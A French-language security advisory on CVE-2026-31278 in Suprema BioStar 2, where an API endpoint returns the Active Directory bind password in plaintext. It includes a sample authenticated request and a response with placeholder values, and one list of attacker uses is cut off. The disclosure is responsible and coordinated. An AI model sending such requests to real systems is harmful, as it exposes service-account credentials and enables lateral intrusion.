
Analyse de la CVE relative à la vulnérabilité d'exposition des identifiants Active Directory dans Suprema BioStar 2
| Champ | Détails |
|---|---|
| Identifiant CVE | CVE-2026-31278 |
| Fournisseur | Suprema Inc. |
| Produit | BioStar 2 |
| Type de vulnérabilité | Divulgation d'informations sensibles / Exposition d'identifiants |
| Vecteur d'attaque | À distance / Authentifié / Faible complexité |
| Sévérité | Élevée |
| Corrigé dans | BioStar 2 v2.9.12 / BioStarX v1.0.2 |
| Chercheur | Abdullah Alannaz |
Une vulnérabilité de divulgation d'informations sensibles existe dans Suprema BioStar 2 en raison d'une gestion incorrecte des paramètres d'intégration Active Directory. Le point de terminaison API backend /api/v2/setting/adserversetting renvoie les identifiants du compte de liaison Active Directory en clair, bien que le mot de passe soit masqué dans l'interface d'administration.
Bien que le champ mot de passe soit masqué dans l'interface d'administration, les requêtes authentifiées adressées à l'API backend divulguent le mot de passe complet non chiffré ainsi que les paramètres de configuration LDAP, y compris la communication SSL désactivée.
Un attaquant authentifié envoie une requête HTTP GET au point de terminaison de configuration du serveur AD et reçoit le mot de passe du compte de service Active Directory en clair dans la réponse du serveur.
Requête :
GET /api/v2/setting/adserversetting HTTP/1.1
Host: <target>
Authorization: Bearer <token>
Réponse :
{
"ad_server": "ldap://internal.domain.local",
"bind_dn": "CN=svc_biostar,DC=domain,DC=local",
"password": "<plaintext_password_returned_here>",
"ssl_enabled": false
}
Un attaquant authentifié peut exploiter les identifiants divulgués pour :
CVE-2026-31278 attribué par MITRE | Correctif publié BioStar 2 v2.9.12 / BioStarX v1.0.2 |
Abdullah Alannaz Chercheur en sécurité
Cette vulnérabilité a été divulguée de manière responsable à Suprema. Le fournisseur a confirmé le problème et a coordonné l'attribution du CVE avec MITRE.